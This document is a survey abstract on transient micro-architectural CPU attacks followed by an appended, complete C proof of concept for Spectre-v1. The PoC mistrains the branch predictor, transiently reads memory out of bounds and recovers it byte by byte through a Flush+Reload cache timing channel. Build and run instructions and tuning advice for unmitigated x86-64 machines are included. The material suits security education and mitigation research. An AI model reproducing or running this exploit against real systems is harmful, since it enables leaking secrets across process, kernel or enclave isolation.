Over the last two decades, the evolving cyber-threat landscape has brought to center stage the contentious tradeoff between the security and performance of modern microprocessors. The guarantees the hardware provides to ensure that process boundaries are not violated have been shown to be breached in several real-world scenarios. While modern CPU features such as superscalar, out-of-order, simultaneously multi-threaded, and speculative execution play a critical role in boosting system performance, they are also central to a potent class of security attacks termed transient micro-architectural attacks. These attacks leverage shared hardware resources in the CPU that are used during speculative and out-of-order execution to steal sensitive information: an instruction that executes transiently and is later squashed still leaves a secret-dependent footprint in a shared resource such as the cache, which the attacker recovers with a timing measurement. Researchers have used these attacks to read data belonging to the operating system (OS) and to Trusted Execution Environments (TEEs), and even to break hardware-enforced isolation. Over the years, several variants of transient micro-architectural attacks have been developed. While each variant differs in the shared hardware resource it exploits, the underlying attack follows a similar strategy. This paper presents a panoramic view of security concerns in modern CPUs, focusing on the mechanisms of these attacks and providing a classification of the variants. Further, we discuss state-of-the-art defense mechanisms for mitigating these attacks.
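To make the shared strategy concrete, here is an added example (not code from the surveyed paper) of its best-known instance: a Spectre-v1 bounds-check-bypass gadget whose transient out-of-bounds read is recovered through a Flush+Reload cache covert channel. It assumes an x86-64 machine with clflush and rdtscp available and no mitigations such as a serializing fence in the gadget; the array1/array2/secret layout, the 200-round mistraining loop and the threshold calibration are the example's own choices, and the non-x86 fallback only builds, it cannot leak.

```c
/* Added example (not from the paper): Spectre-v1 gadget + Flush+Reload channel.
 * The three steps every transient attack shares: (1) mistrain a predictor,
 * (2) let the victim transiently touch a secret-dependent shared resource
 * (a cache line of array2), (3) time that resource after the work is squashed.
 * Assumes x86-64 with clflush/rdtscp; the non-x86 fallback builds but cannot leak. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static inline void flush_line(const void *p) { _mm_clflush(p); }
static inline uint64_t time_access(const volatile uint8_t *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;                        /* volatile: the load is really issued */
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}
#else
#include <time.h>
static inline void flush_line(const void *p) { (void)p; }   /* no cache flush here */
static inline uint64_t time_access(const volatile uint8_t *p) {
    struct timespec a, b;
    clock_gettime(CLOCK_MONOTONIC, &a);
    (void)*p;
    clock_gettime(CLOCK_MONOTONIC, &b);
    return (uint64_t)((b.tv_sec - a.tv_sec) * 1000000000L + (b.tv_nsec - a.tv_nsec));
}
#endif

#define PAGE 4096                    /* one probe line per page defeats adjacent-line prefetch */
uint8_t array1_size = 16;            /* the bound; flushed so the check resolves slowly */
uint8_t array1[16] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
uint8_t array2[256 * PAGE];          /* covert channel: line i cached <=> leaked byte == i */
static char secret[] = "The Magic Words are Squeamish Ossifrage.";  /* constructed sample */
volatile uint8_t sink;

void init_channel(void) { memset(array2, 1, sizeof(array2)); }  /* back every page */

/* The vulnerable gadget. Architecturally it never reads past array1, but while the
 * cache-missing bound is fetched the predicted path already runs array1[x]. */
__attribute__((noinline)) int victim(size_t x) {
    if (x < array1_size) {
        uint8_t v = array2[array1[x] * PAGE];
        sink = v;
        return v;
    }
    return 0;
}

/* Hit/miss threshold measured on this machine rather than guessed. */
uint64_t calibrate_threshold(void) {
    uint64_t hit = 0, miss = 0;
    for (int i = 0; i < 100; i++) {
        volatile uint8_t *p = &array2[(i & 255) * PAGE];
        (void)*p;
        hit += time_access(p);
        flush_line((const void *)p);
        miss += time_access(p);
    }
    return (hit + miss) / 200;       /* midpoint of the two averages */
}

/* Recover the byte at array1 + target. Returns the most-voted value; *score gets its votes. */
int leak_byte(size_t target, int *score) {
    init_channel();
    uint64_t threshold = calibrate_threshold();
    int results[256] = {0};
    for (int round = 0; round < 200; round++) {
        size_t training_x = (size_t)(round % array1_size);
        for (int i = 0; i < 256; i++) flush_line(&array2[i * PAGE]);
        for (int j = 29; j >= 0; j--) {
            flush_line(&array1_size);
            for (volatile int z = 0; z < 100; z++) { }      /* let the flush land */
            /* Branch-free select: five in-bounds training calls, then the malicious x.
             * A visible if/else here would itself train the predictor. */
            size_t x = (size_t)(((j % 6) - 1) & ~0xFFFF);   /* 0 or all-ones */
            x = x | (x >> 16);
            x = training_x ^ (x & (target ^ training_x));
            victim(x);
        }
        /* Probe in a scrambled order so the stride prefetcher does not help. */
        for (int i = 0; i < 256; i++) {
            int mix_i = ((i * 167) + 13) & 255;
            if (time_access(&array2[mix_i * PAGE]) <= threshold && mix_i != array1[training_x])
                results[mix_i]++;
        }
    }
    int best = 0;
    for (int i = 1; i < 256; i++) if (results[i] > results[best]) best = i;
    if (score) *score = results[best];
    return best;
}

int main(void) {
    size_t target = (size_t)((uintptr_t)secret - (uintptr_t)array1);  /* out-of-bounds offset */
    for (size_t i = 0; i + 1 < sizeof(secret); i++) {
        int score;
        int b = leak_byte(target + i, &score);
        printf("array1+%zu: 0x%02x '%c' votes=%d\n", target + i, b,
               (b >= 0x20 && b < 0x7f) ? b : '?', score);
    }
    return 0;
}
```

Build with `gcc -O1 spectre_v1.c -o spectre_v1` and run on an unmitigated x86-64 core; a low vote count for a byte means the predictor was not mistrained (try fewer optimizations or more rounds), while a correct architectural result with no leak is exactly what an `lfence` after the bounds check, or index masking, produces.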